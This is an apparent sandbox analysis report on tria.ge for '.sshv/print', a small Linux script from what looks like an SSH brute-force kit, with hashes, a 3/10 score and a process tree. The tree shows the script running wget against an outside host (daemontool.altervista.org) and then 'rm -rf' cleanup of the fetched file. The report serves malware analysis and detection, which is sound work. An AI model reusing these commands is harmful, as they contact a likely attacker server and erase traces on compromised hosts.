Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

3

Static

static

1

.sshv/brute

ubuntu-18.04-amd64

1

.sshv/print

ubuntu-18.04-amd64

3

.sshv/print

debian-9-armhf

3

.sshv/print

debian-9-mips

1

.sshv/print

debian-9-mipsel

1

.sshv/ps

ubuntu-18.04-amd64

.sshv/rand

ubuntu-18.04-amd64

1

.sshv/rand

debian-9-armhf

1

.sshv/rand

debian-9-mips

1

.sshv/rand

debian-9-mipsel

1

.sshv/ss

ubuntu-18.04-amd64

1

.sshv/su

ubuntu-18.04-amd64

3

.sshv/su

debian-9-armhf

3

.sshv/su

debian-9-mips

1

.sshv/su

debian-9-mipsel

3

Analysis

  • max time kernel
    6s
  • max time network
    9s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20231215-en
  • resource tags

    arch:armhfimage:debian9-armhf-20231215-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    22/12/2023, 05:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    .sshv/print

  • Size

    164B

  • MD5

    02ddd005cd1f584e409d4ba1ebca47b7

  • SHA1

    320fe8d6d49a9cd9a51d4b831716cacabb089e07

  • SHA256

    390037fb108d497718e2a2b33a010d8a0ad0415b4c640cb63c73a8cbfd6946ae

  • SHA512

    d04375488ccdf267e35ced32c6e61e9e67c049eacba7cb5b60c17fe4be19673a65154e0d1378e960cc284683bf3cd99ead91530bc79021670e0e90667d48c1a4

Score
3/10

Malware Config

Signatures

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/.sshv/print
    /tmp/.sshv/print
    1⤵
      PID:654
      • /usr/bin/wget
        wget -O .tmp "http://daemontool.altervista.org/js1/i.php?request=test"
        2⤵
        • Writes file to tmp directory
        PID:663
      • /bin/rm
        rm -rf .tmp
        2⤵
          PID:664
        • /bin/rm
          rm -rf "*request*"
          2⤵
            PID:665
        • /bin/cat
          cat t.log
          1⤵
            PID:657
          • /usr/bin/sort
            sort
            1⤵
              PID:660
            • /usr/bin/uniq
              uniq
              1⤵
                PID:661

              Network

              MITRE ATT&CK Matrix

              Replay Monitor

              Loading Replay Monitor...

              Downloads